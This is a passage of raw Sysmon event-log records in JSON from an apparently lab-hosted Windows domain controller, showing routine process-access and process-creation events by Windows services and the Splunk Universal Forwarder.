05:52:54.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5727,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:54.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:54.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5728,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:54.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:54.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5729,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:54.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:54.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5730,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:54.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:54.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5731,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:54.453\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0336-5F25-0000-001088CA0A00}\r\nTargetProcessId: 4296\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:54.453","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0336-5F25-0000-001088CA0A00}","TargetProcessId":"4296","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5732,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:54.594\r\nSourceProcessGUID: {A837DB8D-0336-5F25-0000-001088CA0A00}\r\nSourceProcessId: 4296\r\nSourceThreadId: 4936\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:54.594","SourceProcessGUID":"{A837DB8D-0336-5F25-0000-001088CA0A00}","SourceProcessId":"4296","SourceThreadId":"4936","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5733,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:55.097\r\nProcessGuid: {A837DB8D-0337-5F25-0000-001038CC0A00}\r\nProcessId: 2360\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:55.097","ProcessGuid":"{A837DB8D-0337-5F25-0000-001038CC0A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:52:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5734,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:55.094\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0337-5F25-0000-001038CC0A00}\r\nTargetProcessId: 2360\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:55.094","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0337-5F25-0000-001038CC0A00}","TargetProcessId":"2360","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
